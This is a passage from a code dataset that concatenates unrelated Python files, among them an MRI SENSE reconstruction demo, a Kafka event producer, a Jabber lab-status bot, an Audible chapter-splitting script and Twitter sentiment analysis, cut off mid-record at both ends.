'longest')\n","sub_path":"q1Lcs.py","file_name":"q1Lcs.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"483076779","text":"\"\"\"\nSetup of Berkeley AUTOLab Perception module Python codebase.\nAuthor: Jeff Mahler\n\"\"\"\nfrom setuptools import setup\n\nrequirements = [\n 'numpy',\n 'scipy',\n 'autolab_core',\n 'matplotlib',\n 'multiprocess',\n 'opencv-python',\n 'keras',\n 'cycler',\n 'Pillow',\n 'pyserial',\n 'ipython',\n 'scikit-image',\n 'scikit-learn',\n 'scikit-video',\n 'ffmpeg-python'\n]\n\nexec(open('perception/version.py').read())\n\nsetup(name='autolab_perception',\n version=__version__,\n description='Perception utilities for the Berkeley AutoLab',\n author='Jeff Mahler',\n author_email='jmahler@berkeley.edu',\n license = 'Apache Software License',\n url = 'https://github.com/BerkeleyAutomation/perception',\n 
keywords = 'robotics grasping vision perception',\n classifiers = [\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: Apache Software License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Natural Language :: English',\n 'Topic :: Scientific/Engineering'\n ],\n packages=['perception'],\n install_requires = requirements,\n extras_require = { 'docs' : [\n 'sphinx',\n 'sphinxcontrib-napoleon',\n 'sphinx_rtd_theme'\n ],\n 'ros' : [\n 'primesense',\n 'rospkg',\n 'catkin_pkg',\n 'empy'\n ],\n }\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"58584414","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Written by Shikai Jin on 2018-Jun-23, latest modified on 2018-Jun-28\n# This is a revised Python3 version of old script (Weihua's version)\n# This script is used for getting the aligned regions from the sequence alignment algorithm.\n\n\nimport Bio.PDB as bpdb\nimport argparse\n\n\ndef read_alignment(alignment):\n with open(alignment, 'r') as f:\n strs = f.readline().split()\n target = strs[1]\n targ_start = int(strs[0])\n strs = f.readline().split()\n template = strs[1]\n temp_start = int(strs[0])\n\n print('The target length is: ' + str(len(target)))\n print('The template length is: ' + str(len(template)))\n\n if len(target) != len(template):\n print('ERROR: The target length is not equal to template length!')\n exit()\n\n targ_ind = targ_start - 1\n temp_ind = temp_start - 1\n targ_seq = []\n temp_seq = []\n\n for i in range(len(target)):\n if template[i] != '-':\n temp_ind = temp_ind + 1\n if target[i] != '-':\n targ_ind = targ_ind + 1\n if target[i] != '-' and template[i] != '-':\n targ_seq.append(targ_ind)\n temp_seq.append(temp_ind)\n\n print('The target sequence is ' + str(targ_seq))\n print('The template sequence is ' + str(temp_seq))\n\n return targ_seq, temp_seq\n\ndef find(resid, seqind):\n for i in range(len(seqind)):\n if resid == seqind[i]:\n return (i + 1)\n return -1 # Avoid returning NoneType\n\n\nclass ResSelect(bpdb.Select):\n def __init__(self, temp_seq, chain_id):\n super().__init__() # Inherit attributes from parents\n self.temp_seq = temp_seq\n self.chain_id = chain_id\n\n def accept_residue(self, res):\n ind = find(res.id[1], self.temp_seq)\n if ind > 0 and res.parent.id == self.chain_id:\n return True\n else:\n return False\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"This script gets the aligned regions from the sequence alignment algorithm\")\n parser.add_argument(\"input\", help=\"The file name of input pdb\", type=str)\n parser.add_argument(\"output\", help=\"The file name of output pdb\", type=str)\n parser.add_argument(\"align\", help=\"The alignment file name\", type=str)\n parser.add_argument(\"chain\", help=\"The chain ID\", type=str)\n args = parser.parse_args()\n input = args.input\n output = args.output\n alignment = args.align\n chain_id = args.chain\n\n if input[-4:].lower() != \".pdb\":\n input = input + \".pdb\"\n if output[-4:].lower() != \".pdb\":\n output = output + \".pdb\"\n\n (targ_seq, temp_seq) = read_alignment(alignment)\n\n s = bpdb.PDBParser().get_structure('temp', input)\n io1 = bpdb.PDBIO()\n io1.set_structure(s)\n io1.save('temp1.pdb', ResSelect(temp_seq, chain_id))\n\n s = bpdb.PDBParser().get_structure('temp', 'temp1.pdb')\n model 
= s[0]\n chain = model[chain_id]\n\n for residue in chain:\n resind = targ_seq[find(residue.id[1], temp_seq) - 1]\n residue.id = (' ', resind, ' ')\n\n io2 = bpdb.PDBIO()\n io2.set_structure(s)\n io2.save(output)\n\nif __name__ == '__main__':\n main()\n","sub_path":"select_align.py","file_name":"select_align.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"543920238","text":"import json\nimport logging\nfrom kafka import KafkaProducer\nfrom app.config import kafka_producer_config\nfrom app.domain_event import DomainEvent\n\nlogger = logging.getLogger(\"app.user_producer\")\n\nclass UserProducer():\n \"\"\"User event producer class that can be used to publish messages to Kafka.\"\"\"\n\n def __init__(self):\n super().__init__()\n self.producer = KafkaProducer(\n bootstrap_servers=[kafka_producer_config[\"bootstrap_servers\"]],\n value_serializer=lambda m: json.dumps(m).encode(\"ascii\")\n )\n \n def error_callback(self, e: Exception):\n logger.error(\"Failed to publish an event\", exc_info=e)\n\n def publish(self, topic: str, event: DomainEvent):\n \"\"\"Publish an event to given topic.\n \n Arguments:\n\n topic {str} -- The target topic\n\n event {DomainEvent} -- The domain event to publish\n \"\"\"\n self.producer.send(topic, event.to_dict()).add_errback(self.error_callback)\n\n def clean_up(self):\n \"\"\"Cleanup the procuder. This will block until all messages has been flushed.\"\"\"\n self.producer.flush()\n self.producer.close(2)\n","sub_path":"user-service/app/user_producer.py","file_name":"user_producer.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"652017477","text":"#! -*- coding: utf-8 -*-\nfrom .quantize import mmcq\n\n__version__ = (0, 0, 1)\n\n\ndef get_palette(image, color_count=10, quality=1):\n colors = []\n for y in xrange(0, image.size[1]):\n for x in xrange(0, image.size[0], quality):\n r, g, b = image.getpixel((x, y))\n if r < 250 and g < 250 and b < 250:\n colors.append((r, g, b))\n\n c_map = mmcq(colors, color_count)\n return c_map.palette\n","sub_path":"mmcq/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"20697310","text":"#!/usr/bin/env python\n\n\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see .\n\n\nfrom jabberbot import JabberBot,botcmd\nimport datetime\nimport random\nimport os\nimport sys\n\n\nclass SystemInfoJabberBot(JabberBot):\n\n NODATA = \"waiting for data - please make a call\"\n CLOSED = \"geschlossen\"\n OPEN = \"offen\"\n\n # where are my images?\n www_nodata=\"/srv/www.das-labor.org/htdoc/statusNONE.png\"\n www_closed=\"/srv/www.das-labor.org/htdoc/statusOFF.png\"\n www_open=\"/srv/www.das-labor.org/htdoc/statusON.png\"\n # what is the destination of that image\n www_show=\"/srv/www.das-labor.org/htdoc/status.png\"\n\n #datetime of the last statusupdate\n dt_lastmessage=datetime.datetime(1,1,1,0,0, 0, 0)\n @botcmd\n def mauz(self,mess,args):\n \"\"\"react on schnittchen\"\"\"\n response=['wwaaahhhh Kratzenhaare!!!',\n '/me bindet die Kratze ans Channeltopic',\n '/me klebt ne Gummiemaus an die Decke',\n '/me verteilt Katzenminze im Channel',\n 'komm kitty kitty komm ... ich hab da was feines',\n '/me hebt das Schild \"Niedliche Katze zu verschenken!\" hoch',\n 'KATZLA!',\n '/me wirft ein supraleitendes Wollknaeul in den Channel',\n '/me spielt mit The Schaumstoffball from Hell',\n 'http://www.youtube.com/watch?v=7dBUJI-Axz0',\n 'miauuuu',\n '/me verteilt Antistatiktueten',\n '/me macht das Licht aus',\n 'Wauh grrr Wauh',\n 'http://www.cuisine.at/rezept_0886450_katze_in_sahne_auf_polnische_art.php']\n if mess.getFrom() == \"labor@conference.das-labor.org/channelkatze\":\n return str(random.choice(response))\n\n @botcmd\n def help(self,mess,args):\n return None\n\n @botcmd\n def kratze(self,mess,args):\n \"\"\"whats a kratze\"\"\"\n return \"Jeder Buchling kennt Hildegunst von Mythenmetz fabelhaften Roman ueber Echo, das Kraetzchen - eine zamonische Kratze unterscheidet sich uebrigens von unserer Katze lediglich dadurch, dass sie sprechen kann: In Sledwaya, der traurigsten Stadt Zamoniens, ist Echo dermassen in Schwierigkeiten geraten, dass er gezwungen ist, mit dem Schrecksenmeister Succubius Eisspin einen verhaengnisvollen Vertrag zu schliessen.\"\n\n\n # need to override callback for keepalive\n def callback_keepalive(self):\n dt_now=datetime.datetime.now()\n if ((dt_now-self.dt_lastmessage).seconds > 120) or ((dt_now-self.dt_lastmessage).days != 0):\n self.set_status(self.NODATA)\n self.set_show(self.AWAY)\n os.system(\"cp \"+str(self.www_nodata)+\" \"+str(self.www_show))\n self._send_status()\n\n @botcmd\n def setoffen(self,mess,args):\n \"\"\"what to do if signal for labor open arrives\"\"\"\n if mess.getFrom() == \"statsetter@das-labor.org/JabberBot\": \n self.dt_lastmessage=datetime.datetime.now()\n self.set_status(self.OPEN)\n self.set_show(self.AVAILABLE)\n os.system(\"cp \"+str(self.www_open)+\" \"+str(self.www_show))\n # change other files hier\n\n @botcmd\n def setzu(self,mess,args):\n \"\"\"what to do if signal for labor closed arrives\"\"\"\n if mess.getFrom() == \"statsetter@das-labor.org/JabberBot\":\n self.dt_lastmessage=datetime.datetime.now()\n self.set_status(self.CLOSED)\n self.set_show(self.DND)\n os.system(\"cp \"+str(self.www_closed)+\" \"+str(self.www_show))\n # change other files hier\n\n\ndef connect_callback():\n # set default status\n bot.set_show(bot.AWAY)\n bot.set_status(bot.NODATA)\n\n\n\nusername = 'status@das-labor.org/statusdaemon'\npassword = 'password'\n\nbot = SystemInfoJabberBot(username,password)\n#register some 
commands\nbot.commands[\"*mauz*\"]=bot.mauz\nbot.commands[\"*maunz*\"]=bot.mauz\nbot.commands[\"mauz!\"]=bot.mauz\nbot.commands[\"maunz!\"]=bot.mauz\nbot.commands[\"maunz\"]=bot.mauz\nbot.commands[\"miau\"]=bot.mauz\nbot.commands[\"miau!\"]=bot.mauz\nbot.commands[\"*miau*\"]=bot.mauz\nbot.commands[\"kratze?\"]=bot.kratze\nbot.join_room(\"labor@conference.das-labor.org\",username=\"#ChanServ\")\nbot.serve_forever(connect_callback,connects=0)\n\n\n\n","sub_path":"tools/statusbot/server/trunk/mybot.py","file_name":"mybot.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"112807354","text":"import numpy as np\n\n\nclass GaussianDistribution(object):\n \"\"\"\n the Gaussian distribution\n p(x|m,v) = exp(-0.5(x - m).T@v.inv@(x - m))/(sqrt(det(v))*(2pi)**(D/2))\n \"\"\"\n\n def __init__(self, mean=None, var=None):\n \"\"\"\n construct gaussian distribution\n\n Parameters\n ----------\n mean : (ndim,) ndarray\n mean of the Gaussian distribution\n var : (ndim, ndim) ndarray\n variance of the Gaussian distribution\n\n Attributes\n ----------\n ndim : int\n dimensionality\n \"\"\"\n if mean is not None and var is not None:\n assert mean.ndim == 1, mean.ndim\n self.ndim = mean.shape[0]\n assert var.shape == (self.ndim, self.ndim), var.shape\n self.mean = mean\n self.var = var\n\n def fit(self, X):\n \"\"\"\n maximum likelihood estimation of Gaussian distribution\n\n Parameters\n ----------\n X : (sample_size, n_features) ndarray\n input data points\n\n Attributes\n ----------\n ndim : int\n dimensionality\n mean : (n_features,) ndarray\n mean of gaussian distribution\n var : ndarray (n_features, n_features)\n variance of gaussian distribution\n \"\"\"\n if X.ndim == 1:\n X = X[:, None]\n self.ndim = np.size(X, 1)\n self.mean = np.mean(X, axis=0)\n self.var = np.atleast_2d(np.cov(X, rowvar=False))\n\n def proba(self, X):\n \"\"\"\n compute gauss function N(x|mu,Sigma)\n\n Parameters\n ----------\n X : ndarray (sample_size, n_features)\n input\n\n Returns\n -------\n p : ndarray (sample_size,)\n probability density\n \"\"\"\n if X.ndim == 1:\n X = X[:, None]\n d = X - self.mean\n precision = np.linalg.inv(self.var)\n return (\n np.exp(-0.5 * np.sum(d @ precision * d, axis=-1))\n * np.sqrt(np.linalg.det(precision))\n / np.power(2 * np.pi, 0.5 * self.ndim))\n\n def draw(self, n=1):\n \"\"\"\n draw sample from this distribution\n\n Parameters\n ----------\n n : int\n number of samples to draw from the distribution\n\n Returns\n -------\n sample : (n, ndim) ndarray\n generated sample\n \"\"\"\n assert isinstance(n, int), type(n)\n return np.random.multivariate_normal(self.mean, self.var, n)\n","sub_path":"prml/distributions/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"545769437","text":"# GETS THE COLOR PALETTE OF A GIVEN IMAGE AND OUTPUTS THE 3 MAIN COLOURS\n\nimport sys\n\nimport mnist as mnist\nimport numpy as np\nimport io\nimport webcolors\n\n\n\nfrom colorthief import ColorThief\n\ncolor_thief = ColorThief('data/carahair.png')\n# get the dominant color\ndominant_color = color_thief.get_color(quality=1)\n\n\ndomcol = (color_thief.get_color(quality=1))\n\n# build a color palette\npalette = color_thief.get_palette(color_count=10)\n\ndef closest_colour(requested_colour):\n min_colours = {}\n for key, name in webcolors.css3_hex_to_names.items():\n r_c, g_c, b_c = 
webcolors.hex_to_rgb(key)\n rd = (r_c - requested_colour[0]) ** 2\n gd = (g_c - requested_colour[1]) ** 2\n bd = (b_c - requested_colour[2]) ** 2\n min_colours[(rd + gd + bd)] = name\n return min_colours[min(min_colours.keys())]\n\ndef get_colour_name(requested_colour):\n try:\n closest_name = actual_name = webcolors.rgb_to_name(requested_colour)\n except ValueError:\n closest_name = closest_colour(requested_colour)\n actual_name = None\n return actual_name, closest_name\n\nfor x in palette:\n requested_colour = ((x))\n actual_name, closest_name = get_colour_name(requested_colour)\n\n print(closest_name + '')\n print(x)\n\n\n","sub_path":"colorsTest.py","file_name":"colorsTest.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"293254867","text":"#%matplotlib notebook\n\nimport sigpy as sp\nimport sigpy.mri as mr\nimport sigpy.plot as pl\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ntry:\n import mkl\n mkl.set_num_threads(1)\nexcept:\n pass\n\n#%% md\n\n## Set parameters and load dataset\n\n#%%\n\nmax_iter = 30\nlamda = 0.01\n\nksp_file = 'data/brain/ksp.npy'\ncoord_file = 'data/brain/coord.npy'\n\n# Choose computing device.\n# Device(-1) specifies CPU, while others specify GPUs.\n# GPU requires installing cupy.\ntry:\n device = sp.Device(0)\nexcept:\n device = sp.Device(-1)\n\nxp = device.xp\ndevice.use()\n\n# Load datasets.\nksp = xp.load(ksp_file)\ncoord = xp.load(coord_file)\n\ndef show_data_info(data, name):\n print(\"{}: shape={}, dtype={}\".format(name, data.shape, data.dtype))\n\n\n\ndcf = (coord[..., 0]**2 + coord[..., 1]**2)**0.5\npl.ScatterPlot(coord, dcf, title='Density compensation')\n\nshow_data_info(ksp, \"ksp\")\nshow_data_info(coord, \"coord\")\nshow_data_info(dcf, \"dcf\")\n\nimg_grid = sp.nufft_adjoint(ksp * dcf, coord)\npl.ImagePlot(img_grid, z=0, title='Multi-channel Gridding')\n\n\n#%% md\n\n## Estimate sensitivity maps using JSENSE\n\n# Here we use [JSENSE](https://onlinelibrary.wiley.com/doi/full/10.1002/mrm.21245) to estimate sensitivity maps.\n\n#%%\n\nmps = mr.app.JsenseRecon(ksp, coord=coord, device=device).run()\n\n#%% md\n\n## CG\n\n#%%\n\ncg_app = mr.app.SenseRecon(\n ksp, mps, coord=coord, device=device, lamda=lamda,\n max_iter=max_iter, save_objective_values=True)\ncg_img = cg_app.run()\n\npl.ImagePlot(cg_img)\n\n#%% md\n\n## CG with circulant preconditioner\n\n#%%\n\ncirc_precond = mr.circulant_precond(mps, coord=coord, device=device, lamda=lamda)\n\n# Put into linear operator form.\nimg_shape = mps.shape[1:]\nD = sp.linop.Multiply(img_shape, circ_precond)\nP = sp.linop.IFFT(img_shape) * D * sp.linop.FFT(img_shape)\n\ncgc_app = mr.app.SenseRecon(\n ksp, mps, coord=coord, device=device, lamda=lamda, P=P,\n max_iter=max_iter, save_objective_values=True)\ncgc_img = cgc_app.run()\n\npl.ImagePlot(cgc_img)\n\n#%% md\n\n## PDHG\n\n#%%\n\npdhg_app = mr.app.SenseRecon(\n ksp, mps, coord=coord, max_iter=max_iter, lamda=lamda,\n solver='PrimalDualHybridGradient', device=device, save_objective_values=True)\npdhg_img = pdhg_app.run()\n\npl.ImagePlot(pdhg_img)\n\n#%% md\n\n## PDHG with Pipe-Menon density compensation\n\n#%%\n\n# Compute dcf\np = mr.pipe_menon_dcf(coord, device=device)\n\npdhg_dcf_app = mr.app.SenseRecon(\n ksp, mps, coord=coord, sigma=p, max_iter=max_iter, lamda=lamda,\n solver='PrimalDualHybridGradient', device=device, save_objective_values=True)\npdhg_dcf_img = pdhg_dcf_app.run()\n\npl.ImagePlot(pdhg_dcf_img)\n\n#%% md\n\n## PDHG with 
single-channel preconditioner\n\n#%%\n\n# Compute preconditioner\nones = np.ones_like(mps)\nones /= len(mps)**0.5\np = mr.kspace_precond(ones, coord=coord, device=device, lamda=lamda)\n\npdhg_sc_app = mr.app.SenseRecon(\n ksp, mps, coord=coord, sigma=p, max_iter=max_iter, lamda=lamda,\n solver='PrimalDualHybridGradient', device=device, save_objective_values=True)\npdhg_sc_img = pdhg_sc_app.run()\n\npl.ImagePlot(pdhg_sc_img)\n\n#%% md\n\n## PDHG with multi-channel preconditioner\n\n#%%\n\n# Compute preconditioner\np = mr.kspace_precond(mps, coord=coord, device=device, lamda=lamda)\n\npdhg_mc_app = mr.app.SenseRecon(\n ksp, mps, coord=coord, sigma=p, max_iter=max_iter, lamda=lamda,\n solver='PrimalDualHybridGradient', device=device, save_objective_values=True)\npdhg_mc_img = pdhg_mc_app.run()\n\npl.ImagePlot(pdhg_mc_img)\n\n#%% md\n\n## Convergence curves\n\n#%%\n\nplt.figure(figsize=(8, 3))\nplt.semilogy(cg_app.time, cg_app.objective_values,\n marker='v', color='C1')\nplt.semilogy(cgc_app.time, cgc_app.objective_values,\n marker='^', color='C2')\nplt.semilogy(pdhg_app.time, pdhg_app.objective_values,\n marker='+', color='C3')\nplt.semilogy(pdhg_dcf_app.time, pdhg_dcf_app.objective_values,\n marker='s', color='C4')\nplt.semilogy(pdhg_sc_app.time, pdhg_sc_app.objective_values,\n marker='*', color='C5')\nplt.semilogy(pdhg_mc_app.time, pdhg_mc_app.objective_values,\n marker='x', color='C6')\nplt.legend(['CG',\n 'CG w/ circulant precond.',\n 'PDHG',\n 'PDHG w/ density comp.',\n 'PDHG w/ SC k-space precond.',\n 'PDHG w/ MC k-space precond.'])\nplt.ylabel('Objective Value [a.u.]')\nplt.xlabel('Time [s]')\nplt.title(r\"SENSE Reconstruction\")\nplt.tight_layout()\nplt.show()\n","sub_path":"SenseReconstruction.py","file_name":"SenseReconstruction.py","file_ext":"py","file_size_in_byte":4372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"609063135","text":"\r\narry = ['a','c','v','m']\r\n\r\n#imput array, number of rtations and direction (0 == left, 1 == right)\r\ndef rotate(arr,num,d):\r\n if d == 0:\r\n shift = num % len(arr)\r\n arry = arr[shift:] + arr[:shift]\r\n return arry\r\n elif d == 1:\r\n LS = len(arr) - (num % len(arr))\r\n RS = num % len(arr)\r\n arry = arr[::-1][:RS] + arr[:LS] \r\n return arry\r\n\r\nprint(f'{arry}\\n{rotate(arry,4,1)}')\r\n\r\n\r\n\r\n\r\n","sub_path":"General examples/rotate_list.py","file_name":"rotate_list.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"604669045","text":"# Write a computer program capable of reducing the number of intensity levels \r\n# in an image from 256 to 2, in integer powers of 2. 
The desired number of \r\n# intensity levels needs to be a variable input to your program.\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport math # for math.floor\r\n\r\nNUM_LEVEL = 8\r\nd = 256/NUM_LEVEL # Divisor\r\n\r\n# Read image \r\nimg = cv2.imread(\"lenna.png\", cv2.IMREAD_GRAYSCALE) # (512, 512, 3)\r\n\r\n# Access pixels\r\nfor i in range(img.shape[0]):\r\n for j in range(img.shape[1]):\r\n img[i, j] = math.floor(img[i, j] / d) * d # Quantization\r\n\r\n# Show image\r\ncv2.imshow(\"lenna\", img)\r\ncv2.waitKey(0)\r\n","sub_path":"w1/quantization.py","file_name":"quantization.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"451710399","text":"import json\nimport os\nimport re\nimport nltk\nimport csv\n\n\n\nusers = {}\ndict_time_series = {}\njsons_path = \"/home/student/CS_123_project/jsons_dir\"\nbug_dict = {}\n\nWORD_RE = re.compile(r\"[\\w']+\")\n\nnltk.download('stopwords')\nnltk.download('vader_lexicon')\nfrom nltk.corpus import stopwords\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nstop_words=set(stopwords.words(\"english\"))\n\ndef user_time_series():\n\n total_line_count = 0\n geotag_count = 0\n geotag_list = []\n for filename in os.listdir(jsons_path):\n print(filename)\n file_path = jsons_path + \"/\" + filename\n\n with open(file_path) as test_json:\n \n # try:\n lines = test_json.readlines()\n num_lines = len(lines)\n total_line_count += num_lines\n\n for i in range(num_lines):\n line = json.loads(lines[i])\n # total_line_count += 1\n # for l in lines:\n # l = json.loads(l)\n\n # if 'geo' in l:\n\n # if l['geo'] != None:\n # print('geo : {}'.format(l['geo']))\n\n for item in line:\n # print('{} : {} \\n'.format(item, line[item]))\n # print(item)\n\n ## We're going to ignore deleted tweets because it has no data\n if item == 'delete':\n total_line_count -= 1\n continue\n if item == 'user':\n\n ## 'users' is another dictionary\n for item2 in line[item]:\n # print('{} : {} \\n'.format(item2, line[item][item2]))\n identification = line[item]['id']\n user_location = line[item]['location']\n statuses_count = line[item]['statuses_count']\n followers_count = line[item]['followers_count']\n favorites_count = line[item]['favourites_count']\n # print(users)\n\n users[identification] = users.get(identification, 0) + 1\n\n time_stamp = line['created_at']\n place = line['place']\n tweet_id = line['id']\n tweet_text = line['text']\n\n geo = line['geo']\n if line['geo'] != None:\n # write_to_json(\"repeat_tweets.json\", {identification: tweet_text})\n write_csv([tweet_text, tweet_id], \"repeat_tweets.csv\")\n geotag_count += 1\n geotag_list.append(line['geo'])\n\n ## Sentiment Analysis for non empty geos (not the USA)\n filtered = ''\n for word in WORD_RE.findall(tweet_text):\n if word not in stop_words:\n if filtered:\n filtered += ' '\n filtered += str(word)\n # print(filtered)\n sentiment = SentimentIntensityAnalyzer().polarity_scores(filtered)['compound']\n # if identification == 889963667520925698 or identification == \"889963667520925698\":\n # print(\"random user filtered val: \")\n # print(filtered)\n if identification not in dict_time_series:\n dict_time_series[identification] = [[],[]]\n \n dict_time_series[identification][0].append(sentiment)\n dict_time_series[identification][1].append(filtered)\n\n\n\n '''\n DO USER SENTIMENT analysis\n Compare geography?\n // can do a lat long shape to google map to visualize where we are\n // have to do in US\n\n make time 
series\n\n \n '''\n\n # except Exception as e:\n # print('here is excepton:')\n # print(e)\n # print('\\n')\n # print(\"file name is\" + filename)\n # print('here is the json line:\\n')\n # print(line)\n # print(users)\n # print('\\n')\n\n # for user in users:\n # if users[user] > 2:\n # print(user, users[user])\n\n print(\"total lines: \", total_line_count)\n print(\"total geotags: \", geotag_count)\n # print(geotag_list)\n\n\n # print(dict_time_series.keys())\n print('users comparison\\n')\n print(len(dict_time_series))\n print(len(users))\n print(\"\\n\")\n res = 0\n for useri in dict_time_series:\n print(useri,\":\", dict_time_series[useri])\n print(\"\\n\")\n\n\n\ndef write_to_json(filename, data):\n with open(filename, \"a\") as json_file:\n json.dump(data, json_file)\n\ndef write_csv(given_list, filename):\n '''\n Takes a list and creates a csv line of that list or appends a new line\n to an already existing csv file\n\n Inputs:\n given_list (list)\n filename (str): file to store csv\n\n Returns:\n None\n '''\n with open(filename, \"a\") as outfile:\n writer = csv.writer(outfile, delimiter=\"|\")\n writer.writerow(given_list)\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"code/time_series.py","file_name":"time_series.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"145658449","text":"from django.urls import path\nfrom django.conf.urls import url\nfrom first import views\n\n\napp_name = 'first'\n\nurlpatterns = [\n\n path('formviaturas/$', views.form_viaturas_view, name='form_viaturas'),\n path('formservicos/$', views.form_servicos_view, name='form_servicos'),\n path('formparagens/$', views.form_paragens_view, name='form_paragens'),\n\n path('paragens/$', views.ParagensView.as_view(), name='paragens'),\n path('viaturas/$', views.ViaturasView.as_view(), name='viaturas'),\n path('servicos/$', views.servicos, name='servicos'),\n path('pesagens/$', views.pesagens, name='pesagens'),\n\n url(r'^viaturas/(?P[-\\w]+)/$', views.ViaturasDetailView.as_view(), name='viaturas_detail'),\n url(r'^viaturas_create/$', views.ViaturaCreateView.as_view(), name='viaturas_create'),\n url(r'^viaturas_update/(?P[-\\w]+)/$', views.ViaturaUpdateView.as_view(), name='viaturas_update'),\n]\n","sub_path":"first/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"343334996","text":"\n# -*- coding: utf-8 -*-\n__version__ = \"0.02\"\n\n\"\"\"\nSource : https://github.com/izneo-get/audible-tools\n\"\"\"\n\nimport requests\nimport sys\nimport time \nimport re\n\n\nif len(sys.argv) < 2:\n print(\"Usage: \")\n print(sys.argv[0] + \" [FILE_IN [\\\"ffmpeg options\\\" [OUTPUT_EXT]]]\")\n print()\n print(\"Examples:\")\n print(sys.argv[0] + \" B00TKSFFJE\")\n print(sys.argv[0] + \" \\\"https://stories.audible.com/audibleapi/1.0/content/B00TKSFFJE/metadata?drm_type=Hls&response_groups=chapter_info\\\"\")\n print(sys.argv[0] + \" B00TKSFFJE pierre_et_le_loup.mp4\")\n print(sys.argv[0] + \" B00TKSFFJE pierre_et_le_loup.mp4 \\\"-b:a 64k -c:a mp3\\\" mp3\")\n exit()\n\nchapters_url = sys.argv[1]\n\nfile_in = \"file_in.mp4\"\nif len(sys.argv) > 2:\n file_in = sys.argv[2]\nfile_ext = file_in.split('.')[-1]\n\nffmpeg_option = \"-c copy\"\nif len(sys.argv) > 3:\n ffmpeg_option = sys.argv[3]\nif len(sys.argv) > 4:\n file_ext = sys.argv[4]\n\nif re.fullmatch(r\"[\\w]+\", chapters_url):\n chapters_url = 
f\"https://stories.audible.com/audibleapi/1.0/content/{chapters_url}/metadata?drm_type=Hls&response_groups=chapter_info\"\n\nresp = requests.get(chapters_url)\ncontent = resp.json()\nchapters = content['content_metadata']['chapter_info']['chapters']\n\n\n\n\nfor i, chapter in enumerate(chapters):\n start_ms = str(time.strftime('%H:%M:%S', time.gmtime(chapter['start_offset_ms'] / 1000))) + '.' + f\"{(chapter['start_offset_ms'] % 1000):03d}\"\n length_ms = str(time.strftime('%H:%M:%S', time.gmtime(chapter['length_ms'] / 1000))) + '.' + f\"{(chapter['length_ms'] % 1000):03d}\"\n filename = f\"{i:03d} {chapter['title']}.{file_ext}\"\n filename = re.sub(r\"[^\\w\\-_\\. ']\", '_', filename)\n print(f\"ffmpeg -i \\\"{file_in}\\\" -ss {start_ms} -t {length_ms} {ffmpeg_option} \\\"{filename}\\\" && ^\")\n\nprint(\"echo Done!\")","sub_path":"split_audible.py","file_name":"split_audible.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"231397684","text":"\nimport numpy as np\nimport time\n \nclass Board():\n def __init__(self, bits, depth = 0, max_depth = 3, board_size = (20, 10)):\n self.bits = bits\n if depth == 0: \n self.score = 0\n else: \n self.score = self.calculateScore()\n self.depth = depth \n self.children = []\n self.max_depth = max_depth\n self.board_size = board_size\n \n def generateBoard(self, shape):\n children = []\n if self.depth < self.max_depth: \n if shape == \"I\": \n #vertical \n highests = np.argmax(self.bits, 0) \n highests[highests == 0 & np.logical_not(self.bits[0])] = self.board_size[0] \n for num, i in enumerate(highests * (highests > 3)): \n if i > 0:\n mask = np.zeros(self.board_size, dtype=bool)\n mask[range(i-4,i), num] = True\n b = Board(self.bits | mask, self.depth + 1, self.max_depth, self.board_size) \n children.append(b)\n # horizontal \n for i in range(self.board_size[1] - 3):\n if np.all(highests[range(i,i+4)] > 0):\n num = min(highests[range(i,i+4)]) - 1\n if np.all(highests[range(i,i+4)] == highests[i]):\n mask = np.zeros(self.board_size, dtype=bool)\n mask[num, range(i,i+4)] = True \n b = Board(self.bits | mask, self.depth + 1, self.max_depth, self.board_size) \n children.append(b)\n if shape == \"O\": \n highests = np.argmax(self.bits, 